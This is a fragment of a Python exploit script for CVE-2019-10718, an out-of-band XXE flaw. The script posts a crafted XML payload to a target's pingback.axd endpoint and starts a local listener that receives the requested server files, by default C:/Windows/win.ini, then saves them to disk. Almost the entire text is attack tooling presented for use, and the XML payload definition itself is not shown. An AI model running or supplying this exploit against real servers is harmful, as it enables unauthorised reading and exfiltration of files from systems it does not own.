class S(http.server.SimpleHTTPRequestHandler):
server_version = 'A Patchey Webserver'
sys_version = '3.1415926535897932384626433832795028841971693993751058209749445923078'
error_message_format = 'Donde esta la biblioteca?'
def main(rhost, lhost, lport, files, timeout, proxy, output_dir):
print(output_dir)
if not output_dir:
return
for f in files:
file_queue.put_nowait(f)
server = S
server.lhost, server.lport = lhost, lport
p = multiprocessing.Process(target=start_server, args=(lhost,lport,server))
p.start()
for num, f in enumerate(files):
print("\nRequesting {} ...".format(f))
count = 0
r = requests.post(rhost + "/pingback.axd", data=xml.format(lhost=lhost, lport=lport), proxies=proxies if proxy else {}, headers={"Content-Type": "text/xml"})
response = True
while num == response_counter.value:
if count >= timeout:
response = False
response_counter.value += 1
print("Unable to read {}".format(f))
break
time.sleep(1)
count += 1
if response:
os.makedirs(output_dir, exist_ok=True)
with open("{}/{}".format(output_dir, os.path.splitdrive(f)[1].replace(':','').replace('/','_')), 'w') as fh:
fh.write(urllib.parse.unquote(response_queue.get()).replace('/X?',''))
p.terminate()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2019-10718 OOB XXE')
parser.add_argument('-r', '--rhost', action="store", dest="rhost", required=True, help='Target host')
parser.add_argument('-l', '--lhost', action="store", dest="lhost", required=True, help='Local host')
parser.add_argument('-p', '--lport', action="store", dest="lport", type=int, required=True, help='Local port')
parser.add_argument('-f', '--files', nargs='+', default="C:/Windows/win.ini", help='Files to read on RHOST')
parser.add_argument('-t', '--timeout', type=int, default=3, help='How long to wait before moving on to next file')
parser.add_argument('-x', '--proxy', dest="proxy", action="store_true", default=False, help='Pass requests through a proxy')
parser.add_argument('-o', '--output', nargs='?', default="./CVE-2019-10718", help='Output directory. Default ./CVE-2019-10718')
args = parser.parse_args()